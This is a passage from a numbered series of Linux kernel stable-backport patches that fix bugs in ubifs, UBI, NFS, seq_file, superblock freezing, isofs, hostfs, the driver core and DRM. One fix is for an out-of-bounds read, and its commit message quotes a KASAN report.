start + len; struct ocfs2_super *osb = OCFS2_SB(inode->i_sb); unsigned int csize = osb->s_clustersize; handle_t *handle; @@ -1531,18 +1532,31 @@ static int ocfs2_zero_partial_clusters(struct inode *inode, } /* - * We want to get the byte offset of the end of the 1st cluster. + * If start is on a cluster boundary and end is somewhere in another + * cluster, we have not COWed the cluster starting at start, unless + * end is also within the same cluster. So, in this case, we skip this + * first call to ocfs2_zero_range_for_truncate() truncate and move on + * to the next one. */ - tmpend = (u64)osb->s_clustersize + (start & ~(osb->s_clustersize - 1)); - if (tmpend > end) - tmpend = end; + if ((start & (csize - 1)) != 0) { + /* + * We want to get the byte offset of the end of the 1st + * cluster. + */ + tmpend = (u64)osb->s_clustersize + + (start & ~(osb->s_clustersize - 1)); + if (tmpend > end) + tmpend = end; - trace_ocfs2_zero_partial_clusters_range1((unsigned long long)start, - (unsigned long long)tmpend); + trace_ocfs2_zero_partial_clusters_range1( + (unsigned long long)start, + (unsigned long long)tmpend); - ret = ocfs2_zero_range_for_truncate(inode, handle, start, tmpend); - if (ret) - mlog_errno(ret); + ret = ocfs2_zero_range_for_truncate(inode, handle, start, + tmpend); + if (ret) + mlog_errno(ret); + } if (tmpend < end) { /* From cfd4e393182072bf84f13864ce84f3d60ab3ba1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Vincent=20Stehl=C3=A9?= Date: Fri, 12 Aug 2016 15:26:30 +0200 Subject: [PATCH 166/315] ubifs: Fix assertion in layout_in_gaps() MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit c0082e985fdf77b02fc9e0dac3b58504dcf11b7a upstream. An assertion in layout_in_gaps() verifies that the gap_lebs pointer is below the maximum bound. When computing this maximum bound the idx_lebs count is multiplied by sizeof(int), while C pointers arithmetic does take into account the size of the pointed elements implicitly already. Remove the multiplication to fix the assertion. Fixes: 1e51764a3c2ac05a ("UBIFS: add new flash file system") Signed-off-by: Vincent Stehlé Cc: Artem Bityutskiy Signed-off-by: Artem Bityutskiy Signed-off-by: Richard Weinberger Signed-off-by: Willy Tarreau --- fs/ubifs/tnc_commit.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/ubifs/tnc_commit.c b/fs/ubifs/tnc_commit.c index 52a6559275c..3f620c0ba0a 100644 --- a/fs/ubifs/tnc_commit.c +++ b/fs/ubifs/tnc_commit.c @@ -370,7 +370,7 @@ static int layout_in_gaps(struct ubifs_info *c, int cnt) p = c->gap_lebs; do { - ubifs_assert(p < c->gap_lebs + sizeof(int) * c->lst.idx_lebs); + ubifs_assert(p < c->gap_lebs + c->lst.idx_lebs); written = layout_leb_in_gaps(c, p); if (written < 0) { err = written; From 5fc1b41eb40fdd2e7b6e0b208b7bb6e3ccf6a2e0 Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Tue, 20 Sep 2016 10:08:30 +0200 Subject: [PATCH 167/315] ubifs: Fix xattr_names length in exit paths commit 843741c5778398ea67055067f4cc65ae6c80ca0e upstream. When the operation fails we also have to undo the changes we made to ->xattr_names. Otherwise listxattr() will report wrong lengths. Signed-off-by: Richard Weinberger Signed-off-by: Willy Tarreau --- fs/ubifs/xattr.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/fs/ubifs/xattr.c b/fs/ubifs/xattr.c index 0f7139bdb2c..69a42f36b42 100644 --- a/fs/ubifs/xattr.c +++ b/fs/ubifs/xattr.c @@ -167,6 +167,7 @@ out_cancel: host_ui->xattr_cnt -= 1; host_ui->xattr_size -= CALC_DENT_SIZE(nm->len); host_ui->xattr_size -= CALC_XATTR_BYTES(size); + host_ui->xattr_names -= nm->len; mutex_unlock(&host_ui->ui_mutex); out_free: make_bad_inode(inode); @@ -514,6 +515,7 @@ out_cancel: host_ui->xattr_cnt += 1; host_ui->xattr_size += CALC_DENT_SIZE(nm->len); host_ui->xattr_size += CALC_XATTR_BYTES(ui->data_len); + host_ui->xattr_names += nm->len; mutex_unlock(&host_ui->ui_mutex); ubifs_release_budget(c, &req); make_bad_inode(inode); From d414505f516ba5af6ef5699a1cc702591bce0d9f Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Mon, 12 Oct 2015 23:35:36 +0200 Subject: [PATCH 168/315] UBIFS: Fix possible memory leak in ubifs_readdir() commit aeeb14f763917ccf639a602cfbeee6957fd944a2 upstream. If ubifs_tnc_next_ent() returns something else than -ENOENT we leak file->private_data. Signed-off-by: Richard Weinberger Reviewed-by: David Gstir Signed-off-by: Willy Tarreau --- fs/ubifs/dir.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c index 605af512aec..879242b1f9f 100644 --- a/fs/ubifs/dir.c +++ b/fs/ubifs/dir.c @@ -467,13 +467,14 @@ static int ubifs_readdir(struct file *file, void *dirent, filldir_t filldir) } out: + kfree(file->private_data); + file->private_data = NULL; + if (err != -ENOENT) { ubifs_err("cannot find next direntry, error %d", err); return err; } - kfree(file->private_data); - file->private_data = NULL; /* 2 is a special value indicating that there are no more direntries */ file->f_pos = 2; return 0; From 1bf1f0c778877f2ba2f1a638a0646c851d47c393 Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Wed, 19 Oct 2016 12:43:07 +0200 Subject: [PATCH 169/315] ubifs: Abort readdir upon error commit c83ed4c9dbb358b9e7707486e167e940d48bfeed upstream. If UBIFS is facing an error while walking a directory, it reports this error and ubifs_readdir() returns the error code. But the VFS readdir logic does not make the getdents system call fail in all cases. When the readdir cursor indicates that more entries are present, the system call will just return and the libc wrapper will try again since it also knows that more entries are present. This causes the libc wrapper to busy loop for ever when a directory is corrupted on UBIFS. A common approach do deal with corrupted directory entries is skipping them by setting the cursor to the next entry. On UBIFS this approach is not possible since we cannot compute the next directory entry cursor position without reading the current entry. So all we can do is setting the cursor to the "no more entries" position and make getdents exit. Signed-off-by: Richard Weinberger [wt: adjusted context] Signed-off-by: Willy Tarreau --- fs/ubifs/dir.c | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c index 879242b1f9f..27b2c23425d 100644 --- a/fs/ubifs/dir.c +++ b/fs/ubifs/dir.c @@ -348,7 +348,8 @@ static unsigned int vfs_dent_type(uint8_t type) */ static int ubifs_readdir(struct file *file, void *dirent, filldir_t filldir) { - int err, over = 0; + int err = 0; + int over = 0; loff_t pos = file->f_pos; struct qstr nm; union ubifs_key key; @@ -470,14 +471,12 @@ out: kfree(file->private_data); file->private_data = NULL; - if (err != -ENOENT) { + if (err != -ENOENT) ubifs_err("cannot find next direntry, error %d", err); - return err; - } /* 2 is a special value indicating that there are no more direntries */ file->f_pos = 2; - return 0; + return err; } static loff_t ubifs_dir_llseek(struct file *file, loff_t offset, int whence) From 55586859c159f05725faa0b119a9c5f21f83ae00 Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Fri, 28 Oct 2016 11:49:03 +0200 Subject: [PATCH 170/315] ubifs: Fix regression in ubifs_readdir() commit a00052a296e54205cf238c75bd98d17d5d02a6db upstream. Commit c83ed4c9dbb35 ("ubifs: Abort readdir upon error") broke overlayfs support because the fix exposed an internal error code to VFS. Reported-by: Peter Rosin Tested-by: Peter Rosin Reported-by: Ralph Sennhauser Tested-by: Ralph Sennhauser Fixes: c83ed4c9dbb35 ("ubifs: Abort readdir upon error") Signed-off-by: Richard Weinberger Signed-off-by: Willy Tarreau --- fs/ubifs/dir.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c index 27b2c23425d..db364d4d0d1 100644 --- a/fs/ubifs/dir.c +++ b/fs/ubifs/dir.c @@ -473,6 +473,14 @@ out: if (err != -ENOENT) ubifs_err("cannot find next direntry, error %d", err); + else + /* + * -ENOENT is a non-fatal error in this context, the TNC uses + * it to indicate that the cursor moved past the current directory + * and readdir() has to stop. + */ + err = 0; + /* 2 is a special value indicating that there are no more direntries */ file->f_pos = 2; From 8a3a266a8ab555b60d42dbf9f785c87516203a30 Mon Sep 17 00:00:00 2001 From: Boris Brezillon Date: Fri, 16 Sep 2016 16:59:12 +0200 Subject: [PATCH 171/315] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header commit ecbfa8eabae9cd73522d1d3d15869703c263d859 upstream. scan_pool() does not mark the PEB for scrubing when bitflips are detected in the EC header of a free PEB (VID header region left to 0xff). Make sure we scrub the PEB in this case. Signed-off-by: Boris Brezillon Fixes: dbb7d2a88d2a ("UBI: Add fastmap core") Signed-off-by: Richard Weinberger Signed-off-by: Willy Tarreau --- drivers/mtd/ubi/fastmap.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/mtd/ubi/fastmap.c b/drivers/mtd/ubi/fastmap.c index bf8108d65b7..f6f1604deb8 100644 --- a/drivers/mtd/ubi/fastmap.c +++ b/drivers/mtd/ubi/fastmap.c @@ -438,10 +438,11 @@ static int scan_pool(struct ubi_device *ubi, struct ubi_attach_info *ai, unsigned long long ec = be64_to_cpu(ech->ec); unmap_peb(ai, pnum); dbg_bld("Adding PEB to free: %i", pnum); + if (err == UBI_IO_FF_BITFLIPS) - add_aeb(ai, free, pnum, ec, 1); - else - add_aeb(ai, free, pnum, ec, 0); + scrub = 1; + + add_aeb(ai, free, pnum, ec, scrub); continue; } else if (err == 0 || err == UBI_IO_BITFLIPS) { dbg_bld("Found non empty PEB:%i in pool", pnum); From cc2098e94abf01818fd04eb2f676d7ea8f2c9d2c Mon Sep 17 00:00:00 2001 From: Trond Myklebust Date: Mon, 29 Aug 2016 11:15:36 -0400 Subject: [PATCH 172/315] NFSv4.x: Fix a refcount leak in nfs_callback_up_net commit 98b0f80c2396224bbbed81792b526e6c72ba9efa upstream. On error, the callers expect us to return without bumping nn->cb_users[]. Signed-off-by: Trond Myklebust Signed-off-by: Willy Tarreau --- fs/nfs/callback.c | 1 + 1 file changed, 1 insertion(+) diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c index e05c96ebb27..57d3b5ef22a 100644 --- a/fs/nfs/callback.c +++ b/fs/nfs/callback.c @@ -302,6 +302,7 @@ static int nfs_callback_up_net(int minorversion, struct svc_serv *serv, struct n err_socks: svc_rpcb_cleanup(serv, net); err_bind: + nn->cb_users[minorversion]--; dprintk("NFS: Couldn't create callback socket: err = %d; " "net = %p\n", ret, net); return ret; From d5ab1c108e32d008c91d85428f9666293912c3ec Mon Sep 17 00:00:00 2001 From: Kinglong Mee Date: Mon, 24 Mar 2014 11:56:59 +0800 Subject: [PATCH 173/315] NFSD: Using free_conn free connection commit 3f42d2c428c724212c5f4249daea97e254eb0546 upstream. Connection from alloc_conn must be freed through free_conn, otherwise, the reference of svc_xprt will never be put. Signed-off-by: Kinglong Mee Signed-off-by: J. Bruce Fields Signed-off-by: Willy Tarreau --- fs/nfsd/nfs4state.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c index 4a58afa9965..b0878e1921b 100644 --- a/fs/nfsd/nfs4state.c +++ b/fs/nfsd/nfs4state.c @@ -2193,7 +2193,8 @@ out: if (!list_empty(&clp->cl_revoked)) seq->status_flags |= SEQ4_STATUS_RECALLABLE_STATE_REVOKED; out_no_session: - kfree(conn); + if (conn) + free_conn(conn); spin_unlock(&nn->client_lock); return status; out_put_session: From e9276478f8025ac7ed68e782932bd2df6c92d0f7 Mon Sep 17 00:00:00 2001 From: Chuck Lever Date: Wed, 29 Jun 2016 13:55:22 -0400 Subject: [PATCH 174/315] NFS: Don't drop CB requests with invalid principals commit a4e187d83d88eeaba6252aac0a2ffe5eaa73a818 upstream. Before commit 778be232a207 ("NFS do not find client in NFSv4 pg_authenticate"), the Linux callback server replied with RPC_AUTH_ERROR / RPC_AUTH_BADCRED, instead of dropping the CB request. Let's restore that behavior so the server has a chance to do something useful about it, and provide a warning that helps admins correct the problem. Fixes: 778be232a207 ("NFS do not find client in NFSv4 ...") Signed-off-by: Chuck Lever Tested-by: Steve Wise Signed-off-by: Anna Schumaker Signed-off-by: Willy Tarreau --- fs/nfs/callback_xdr.c | 6 +++++- net/sunrpc/svc.c | 5 +++++ 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/fs/nfs/callback_xdr.c b/fs/nfs/callback_xdr.c index e98ecf8d258..7f7a89a67c6 100644 --- a/fs/nfs/callback_xdr.c +++ b/fs/nfs/callback_xdr.c @@ -884,7 +884,7 @@ static __be32 nfs4_callback_compound(struct svc_rqst *rqstp, void *argp, void *r if (hdr_arg.minorversion == 0) { cps.clp = nfs4_find_client_ident(SVC_NET(rqstp), hdr_arg.cb_ident); if (!cps.clp || !check_gss_callback_principal(cps.clp, rqstp)) - return rpc_drop_reply; + goto out_invalidcred; } hdr_res.taglen = hdr_arg.taglen; @@ -911,6 +911,10 @@ static __be32 nfs4_callback_compound(struct svc_rqst *rqstp, void *argp, void *r nfs_put_client(cps.clp); dprintk("%s: done, status = %u\n", __func__, ntohl(status)); return rpc_success; + +out_invalidcred: + pr_warn_ratelimited("NFS: NFSv4 callback contains invalid cred\n"); + return rpc_autherr_badcred; } /* diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c index 89a588b4478..6dee8fbb3b1 100644 --- a/net/sunrpc/svc.c +++ b/net/sunrpc/svc.c @@ -1187,6 +1187,11 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv) procp->pc_release(rqstp, NULL, rqstp->rq_resp); goto dropit; } + if (*statp == rpc_autherr_badcred) { + if (procp->pc_release) + procp->pc_release(rqstp, NULL, rqstp->rq_resp); + goto err_bad_auth; + } if (*statp == rpc_success && (xdr = procp->pc_encode) && !xdr(rqstp, resv->iov_base+resv->iov_len, rqstp->rq_resp)) { From 6b2e648364c3fc31f07bdf6d88898318aac3fba1 Mon Sep 17 00:00:00 2001 From: Trond Myklebust Date: Thu, 22 Sep 2016 13:39:18 -0400 Subject: [PATCH 175/315] NFSv4: Open state recovery must account for file permission changes commit 304020fe48c6c7fff8b5a38f382b54404f0f79d3 upstream. If the file permissions change on the server, then we may not be able to recover open state. If so, we need to ensure that we mark the file descriptor appropriately. Signed-off-by: Trond Myklebust Tested-by: Oleg Drokin Signed-off-by: Anna Schumaker Signed-off-by: Willy Tarreau --- fs/nfs/nfs4state.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c index 2bdaf57c82d..7d45b38aeb0 100644 --- a/fs/nfs/nfs4state.c +++ b/fs/nfs/nfs4state.c @@ -1464,6 +1464,9 @@ restart: "Zeroing state\n", __func__, status); case -ENOENT: case -ENOMEM: + case -EACCES: + case -EROFS: + case -EIO: case -ESTALE: /* * Open state on this file cannot be recovered From 3c15d16635ab95e49e8af93dea4d7bf30d16e9ce Mon Sep 17 00:00:00 2001 From: Vegard Nossum Date: Thu, 25 Aug 2016 15:17:11 -0700 Subject: [PATCH 176/315] fs/seq_file: fix out-of-bounds read commit 088bf2ff5d12e2e32ee52a4024fec26e582f44d3 upstream. seq_read() is a nasty piece of work, not to mention buggy. It has (I think) an old bug which allows unprivileged userspace to read beyond the end of m->buf. I was getting these: BUG: KASAN: slab-out-of-bounds in seq_read+0xcd2/0x1480 at addr ffff880116889880 Read of size 2713 by task trinity-c2/1329 CPU: 2 PID: 1329 Comm: trinity-c2 Not tainted 4.8.0-rc1+ #96 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014 Call Trace: kasan_object_err+0x1c/0x80 kasan_report_error+0x2cb/0x7e0 kasan_report+0x4e/0x80 check_memory_region+0x13e/0x1a0 kasan_check_read+0x11/0x20 seq_read+0xcd2/0x1480 proc_reg_read+0x10b/0x260 do_loop_readv_writev.part.5+0x140/0x2c0 do_readv_writev+0x589/0x860 vfs_readv+0x7b/0xd0 do_readv+0xd8/0x2c0 SyS_readv+0xb/0x10 do_syscall_64+0x1b3/0x4b0 entry_SYSCALL64_slow_path+0x25/0x25 Object at ffff880116889100, in cache kmalloc-4096 size: 4096 Allocated: PID = 1329 save_stack_trace+0x26/0x80 save_stack+0x46/0xd0 kasan_kmalloc+0xad/0xe0 __kmalloc+0x1aa/0x4a0 seq_buf_alloc+0x35/0x40 seq_read+0x7d8/0x1480 proc_reg_read+0x10b/0x260 do_loop_readv_writev.part.5+0x140/0x2c0 do_readv_writev+0x589/0x860 vfs_readv+0x7b/0xd0 do_readv+0xd8/0x2c0 SyS_readv+0xb/0x10 do_syscall_64+0x1b3/0x4b0 return_from_SYSCALL_64+0x0/0x6a Freed: PID = 0 (stack is not available) Memory state around the buggy address: ffff88011688a000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff88011688a080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >ffff88011688a100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ^ ffff88011688a180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff88011688a200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================== Disabling lock debugging due to kernel taint This seems to be the same thing that Dave Jones was seeing here: https://lkml.org/lkml/2016/8/12/334 There are multiple issues here: 1) If we enter the function with a non-empty buffer, there is an attempt to flush it. But it was not clearing m->from after doing so, which means that if we try to do this flush twice in a row without any call to traverse() in between, we are going to be reading from the wrong place -- the splat above, fixed by this patch. 2) If there's a short write to userspace because of page faults, the buffer may already contain multiple lines (i.e. pos has advanced by more than 1), but we don't save the progress that was made so the next call will output what we've already returned previously. Since that is a much less serious issue (and I have a headache after staring at seq_read() for the past 8 hours), I'll leave that for now. Link: http://lkml.kernel.org/r/1471447270-32093-1-git-send-email-vegard.nossum@oracle.com Signed-off-by: Vegard Nossum Reported-by: Dave Jones Cc: Al Viro Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- fs/seq_file.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/fs/seq_file.c b/fs/seq_file.c index 3dd44db1465..c009e605c7c 100644 --- a/fs/seq_file.c +++ b/fs/seq_file.c @@ -206,8 +206,10 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) size -= n; buf += n; copied += n; - if (!m->count) + if (!m->count) { + m->from = 0; m->index++; + } if (!size) goto Done; } From b24eac8630f76a4be485959473045371684aa4f8 Mon Sep 17 00:00:00 2001 From: Oleg Nesterov Date: Mon, 26 Sep 2016 18:07:48 +0200 Subject: [PATCH 177/315] fs/super.c: fix race between freeze_super() and thaw_super() commit 89f39af129382a40d7cd1f6914617282cfeee28e upstream. Change thaw_super() to check frozen != SB_FREEZE_COMPLETE rather than frozen == SB_UNFROZEN, otherwise it can race with freeze_super() which drops sb->s_umount after SB_FREEZE_WRITE to preserve the lock ordering. In this case thaw_super() will wrongly call s_op->unfreeze_fs() before it was actually frozen, and call sb_freeze_unlock() which leads to the unbalanced percpu_up_write(). Unfortunately lockdep can't detect this, so this triggers misc BUG_ON()'s in kernel/rcu/sync.c. Reported-and-tested-by: Nikolay Borisov Signed-off-by: Oleg Nesterov Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- fs/super.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/fs/super.c b/fs/super.c index 97280e76179..fd3281d1ec4 100644 --- a/fs/super.c +++ b/fs/super.c @@ -1327,8 +1327,8 @@ int freeze_super(struct super_block *sb) } } /* - * This is just for debugging purposes so that fs can warn if it - * sees write activity when frozen is set to SB_FREEZE_COMPLETE. + * For debugging purposes so that fs can warn if it sees write activity + * when frozen is set to SB_FREEZE_COMPLETE, and for thaw_super(). */ sb->s_writers.frozen = SB_FREEZE_COMPLETE; up_write(&sb->s_umount); @@ -1347,7 +1347,7 @@ int thaw_super(struct super_block *sb) int error; down_write(&sb->s_umount); - if (sb->s_writers.frozen == SB_UNFROZEN) { + if (sb->s_writers.frozen != SB_FREEZE_COMPLETE) { up_write(&sb->s_umount); return -EINVAL; } From ca39cc12d76184890036453ebcfba4371221b5fb Mon Sep 17 00:00:00 2001 From: Jan Kara Date: Tue, 4 Oct 2016 13:44:06 +0200 Subject: [PATCH 178/315] isofs: Do not return EACCES for unknown filesystems commit a2ed0b391dd9c3ef1d64c7c3e370f4a5ffcd324a upstream. When isofs_mount() is called to mount a device read-write, it returns EACCES even before it checks that the device actually contains an isofs filesystem. This may confuse mount(8) which then tries to mount all subsequent filesystem types in read-only mode. Fix the problem by returning EACCES only once we verify that the device indeed contains an iso9660 filesystem. Fixes: 17b7f7cf58926844e1dd40f5eb5348d481deca6a Reported-by: Kent Overstreet Reported-by: Karel Zak Signed-off-by: Jan Kara Signed-off-by: Willy Tarreau --- fs/isofs/inode.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/fs/isofs/inode.c b/fs/isofs/inode.c index 10489bbd40f..955fabf46a7 100644 --- a/fs/isofs/inode.c +++ b/fs/isofs/inode.c @@ -726,6 +726,11 @@ static int isofs_fill_super(struct super_block *s, void *data, int silent) pri_bh = NULL; root_found: + /* We don't support read-write mounts */ + if (!(s->s_flags & MS_RDONLY)) { + error = -EACCES; + goto out_freebh; + } if (joliet_level && (pri == NULL || !opt.rock)) { /* This is the case of Joliet with the norock mount flag. @@ -1538,9 +1543,6 @@ struct inode *__isofs_iget(struct super_block *sb, static struct dentry *isofs_mount(struct file_system_type *fs_type, int flags, const char *dev_name, void *data) { - /* We don't support read-write mounts */ - if (!(flags & MS_RDONLY)) - return ERR_PTR(-EACCES); return mount_bdev(fs_type, flags, dev_name, data, isofs_fill_super); } From cb1f02fdce552a4a962cb290571504ceed9c6d7e Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Wed, 13 Jul 2016 13:12:34 +0300 Subject: [PATCH 179/315] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() commit 8a545f185145e3c09348cd74326268ecfc6715a3 upstream. We can't pass error pointers to kfree() or it causes an oops. Fixes: 52b209f7b848 ('get rid of hostfs_read_inode()') Signed-off-by: Dan Carpenter Signed-off-by: Richard Weinberger Signed-off-by: Willy Tarreau --- fs/hostfs/hostfs_kern.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/fs/hostfs/hostfs_kern.c b/fs/hostfs/hostfs_kern.c index b58a9cbb969..f0faa87e23d 100644 --- a/fs/hostfs/hostfs_kern.c +++ b/fs/hostfs/hostfs_kern.c @@ -942,10 +942,11 @@ static int hostfs_fill_sb_common(struct super_block *sb, void *d, int silent) if (S_ISLNK(root_inode->i_mode)) { char *name = follow_link(host_root_path); - if (IS_ERR(name)) + if (IS_ERR(name)) { err = PTR_ERR(name); - else - err = read_name(root_inode, name); + goto out_put; + } + err = read_name(root_inode, name); kfree(name); if (err) goto out_put; From 2348b4879642321a6ba75dfc34c7b3c01035c703 Mon Sep 17 00:00:00 2001 From: Markus Elfring Date: Thu, 5 Feb 2015 11:48:26 +0100 Subject: [PATCH 180/315] driver core: Delete an unnecessary check before the function call "put_device" commit 5f0163a5ee9cc7c59751768bdfd94a73186debba upstream. The put_device() function tests whether its argument is NULL and then returns immediately. Thus the test around the call is not needed. This issue was detected by using the Coccinelle software. Signed-off-by: Markus Elfring Signed-off-by: Greg Kroah-Hartman [wt: backported only to ease next patch as suggested by Jiri] Signed-off-by: Willy Tarreau --- drivers/base/core.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/base/core.c b/drivers/base/core.c index 2a19097a7cb..d92ecf393c3 100644 --- a/drivers/base/core.c +++ b/drivers/base/core.c @@ -1138,8 +1138,7 @@ done: kobject_del(&dev->kobj); Error: cleanup_device_parent(dev); - if (parent) - put_device(parent); + put_device(parent); name_error: kfree(dev->p); dev->p = NULL; From e7f6e3c9db4b6f259c89fd05728d024ab32acd71 Mon Sep 17 00:00:00 2001 From: Ming Lei Date: Sun, 10 Jul 2016 19:27:36 +0800 Subject: [PATCH 181/315] driver core: fix race between creating/querying glue dir and its cleanup commit cebf8fd16900fdfd58c0028617944f808f97fe50 upstream. The global mutex of 'gdp_mutex' is used to serialize creating/querying glue dir and its cleanup. Turns out it isn't a perfect way because part(kobj_kset_leave()) of the actual cleanup action() is done inside the release handler of the glue dir kobject. That means gdp_mutex has to be held before releasing the last reference count of the glue dir kobject. This patch moves glue dir's cleanup after kobject_del() in device_del() for avoiding the race. Cc: Yijing Wang Reported-by: Chandra Sekhar Lingutla Signed-off-by: Ming Lei Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/base/core.c | 39 +++++++++++++++++++++++++++++---------- 1 file changed, 29 insertions(+), 10 deletions(-) diff --git a/drivers/base/core.c b/drivers/base/core.c index d92ecf393c3..986fc4eeaae 100644 --- a/drivers/base/core.c +++ b/drivers/base/core.c @@ -827,11 +827,29 @@ static struct kobject *get_device_parent(struct device *dev, return NULL; } +static inline bool live_in_glue_dir(struct kobject *kobj, + struct device *dev) +{ + if (!kobj || !dev->class || + kobj->kset != &dev->class->p->glue_dirs) + return false; + return true; +} + +static inline struct kobject *get_glue_dir(struct device *dev) +{ + return dev->kobj.parent; +} + +/* + * make sure cleaning up dir as the last step, we need to make + * sure .release handler of kobject is run with holding the + * global lock + */ static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir) { /* see if we live in a "glue" directory */ - if (!glue_dir || !dev->class || - glue_dir->kset != &dev->class->p->glue_dirs) + if (!live_in_glue_dir(glue_dir, dev)) return; mutex_lock(&gdp_mutex); @@ -839,11 +857,6 @@ static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir) mutex_unlock(&gdp_mutex); } -static void cleanup_device_parent(struct device *dev) -{ - cleanup_glue_dir(dev, dev->kobj.parent); -} - static int device_add_class_symlinks(struct device *dev) { int error; @@ -1007,6 +1020,7 @@ int device_add(struct device *dev) struct kobject *kobj; struct class_interface *class_intf; int error = -EINVAL; + struct kobject *glue_dir = NULL; dev = get_device(dev); if (!dev) @@ -1051,8 +1065,10 @@ int device_add(struct device *dev) /* first, register with generic layer. */ /* we require the name to be set before, and pass NULL */ error = kobject_add(&dev->kobj, dev->kobj.parent, NULL); - if (error) + if (error) { + glue_dir = get_glue_dir(dev); goto Error; + } /* notify platform of device entry */ if (platform_notify) @@ -1135,9 +1151,10 @@ done: device_remove_file(dev, &uevent_attr); attrError: kobject_uevent(&dev->kobj, KOBJ_REMOVE); + glue_dir = get_glue_dir(dev); kobject_del(&dev->kobj); Error: - cleanup_device_parent(dev); + cleanup_glue_dir(dev, glue_dir); put_device(parent); name_error: kfree(dev->p); @@ -1209,6 +1226,7 @@ void put_device(struct device *dev) void device_del(struct device *dev) { struct device *parent = dev->parent; + struct kobject *glue_dir = NULL; struct class_interface *class_intf; /* Notify clients of device removal. This call must come @@ -1250,8 +1268,9 @@ void device_del(struct device *dev) if (platform_notify_remove) platform_notify_remove(dev); kobject_uevent(&dev->kobj, KOBJ_REMOVE); - cleanup_device_parent(dev); + glue_dir = get_glue_dir(dev); kobject_del(&dev->kobj); + cleanup_glue_dir(dev, glue_dir); put_device(parent); } From 85f44a424d80a2cea83279726231818d551b502a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Christian=20K=C3=B6nig?= Date: Wed, 17 Aug 2016 09:46:42 +0200 Subject: [PATCH 182/315] drm/radeon: fix radeon_move_blit on 32bit systems MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 13f479b9df4e2bbf2d16e7e1b02f3f55f70e2455 upstream. This bug seems to be present for a very long time. Signed-off-by: Christian König Reviewed-by: Alex Deucher Signed-off-by: Alex Deucher Signed-off-by: Willy Tarreau --- drivers/gpu/drm/radeon/radeon_ttm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/gpu/drm/radeon/radeon_ttm.c b/drivers/gpu/drm/radeon/radeon_ttm.c index f7015592544..6c92c20426d 100644 --- a/drivers/gpu/drm/radeon/radeon_ttm.c +++ b/drivers/gpu/drm/radeon/radeon_ttm.c @@ -228,8 +228,8 @@ static int radeon_move_blit(struct ttm_buffer_object *bo, rdev = radeon_get_rdev(bo->bdev); ridx = radeon_copy_ring_index(rdev); - old_start = old_mem->start << PAGE_SHIFT; - new_start = new_mem->start << PAGE_SHIFT; + old_start = (u64)old_mem->start << PAGE_SHIFT; + new_start = (u64)new_mem->start << PAGE_SHIFT; switch (old_mem->mem_type) { case TTM_PL_VRAM: From d9488736f7c3199659436ede9c61b8ed25f533e8 Mon Sep 17 00:00:00 2001 From: Daniel Vetter Date: Sat, 20 Aug 2016 12:22:11 +0200 Subject: [PATCH 183/315] drm: Reject page_flip for !DRIVER_MODESET commit 6f00975c619064a18c23fd3aced325ae165a73b9 upstream. Somehow this one slipped through, which means drivers without modeset support can be oopsed (since those also don't call drm_mode_config_init, which means the crtc lookup will chase an uninitalized idr). Reported-by: Alexander Potapenko Cc: Alexander Potapenko Signed-off-by: Daniel Vetter Reviewed-by: Chris Wilson Signed-off-by: Dave Airlie Signed-off-by: Willy Tarreau --- drivers/gpu/drm/drm_crtc.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/gpu/drm/drm_crtc.c b/drivers/gpu/drm/drm_crtc.c index c24c3560683..121680fbebb 100644 --- a/drivers/gpu/drm/drm_crtc.c +++ b/drivers/gpu/drm/drm_crtc.c @@ -3422,6 +3422,9 @@ int drm_mode_page_flip_ioctl(struct drm_device *dev, int hdisplay, vdisplay; int ret = -EINVAL; 